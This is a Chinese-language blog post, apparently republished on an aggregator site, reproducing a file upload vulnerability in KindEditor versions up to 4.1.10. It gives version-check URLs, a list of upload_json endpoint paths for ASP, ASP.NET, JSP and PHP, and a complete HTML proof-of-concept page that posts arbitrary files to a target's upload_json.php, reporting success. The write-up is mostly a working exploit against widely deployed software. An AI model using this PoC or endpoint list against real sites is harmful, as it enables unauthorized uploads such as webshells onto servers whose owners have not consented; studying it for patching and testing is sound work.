美文网首页
KindEditor文件上传漏洞

KindEditor文件上传漏洞

作者: syxvip | 来源:发表于2023-04-29 03:01 被阅读0次

一 、漏洞影响范围
kindeditor版本<=4.1.10

二 、漏洞复现
查看kindeditor版本:

http://x.x.x.x/kindeditor-4.1.10/kindeditor.js    // kindeditor-4.1.10 可尝试替换为 kindeditor
image.png

根据脚本语言自定义不同的上传地址来验证文件 upload_json.*,常见判断路径如下:

 kindeditor/asp/upload_json.asp?dir=file

 kindeditor/asp.net/upload_json.ashx?dir=file

 kindeditor/jsp/upload_json.jsp?dir=file

 kindeditor/php/upload_json.php?dir=file

我这里采用php搭建,所以路径为:

http://x.x.x.x/kindeditor-4.1.10/php/demo.php

返回200 OK 证明存在


image.png

利用poc如下:

<html>
<head>

    <title>Uploader</title>

    <script src="http://x.x.x.x/kindeditor-4.1.10/kindeditor.js"></script>

    <script>

        KindEditor.ready(function (K) {

            var uploadbutton = K.uploadbutton({

                button: K('#uploadButton')[0],
                fieldName: 'imgFile',
                url: 'http://x.x.x.x/kindeditor-4.1.10/php/upload_json.php?dir=file',
                afterUpload: function (data) {
                    if (data.error === 0) {
                        var url = K.formatUrl(data.url, 'absolute');
                        K('#url').val(url);
                    }
                },
            });

            uploadbutton.fileBox.change(function (e) {

                uploadbutton.submit();

            });

        });

    </script>
</head>
<body>

<div class="upload">

    <input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>

    <input type="button" id="uploadButton" value="Upload"/>

</div>

</body>

</html>

上传成功


image.png

相关文章

  • KindEditor 上传漏洞复现

    准备工作: phpstudy,kindeditor 4.1.11官方下载:http://kindeditor.ne...

  • 2018-08-10 web渗透(完)

    今天主要学习的是文件上传漏洞和xss漏洞 文件上传漏洞 【漏洞描述】 文件上传漏洞是指网络攻击者上传了一个可执行的...

  • 文件上传(upload-labs详细全解)

    文件上传漏洞 常见的漏洞分类服务器配置不当导致文件上传开源编辑器存在上传漏洞本地文件上传限制可以上传被绕过服务器端...

  • kindeditor 跨域上传图片配置 富文本编辑

    本文用于解决kindeditor跨域上传配置,服务端上传接口使用java。kindeditor 调用服务端上传接口...

  • 利用KindEditor漏洞上传网马

    KindEditor是常用的富文本编辑器,里边有上传的功能,如果上传文件类型控制的不好,可能就会给网站带来安全问题...

  • 文件上传漏洞

    文件上传漏洞 权限 漏洞分类 利用条件 漏洞挖掘 常见可执行文件后缀

  • 文件上传漏洞

    文件上传漏洞原理文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶...

  • kindeditor<=4.1.5文件上传漏洞复现

    KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Fi...

  • 文件上传漏洞 学习笔记

    什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其...

  • web安全(五)上传漏洞(一)

    只要web应用程序允许上传文件就有可能存在文件上传漏洞。那么如何确认web应用程序是否存在上传漏洞?比如:我...

网友评论

      本文标题:KindEditor文件上传漏洞

      本文链接:https://www.haomeiwen.com/subject/jttgjdtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|KindEditor文件上传漏洞|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!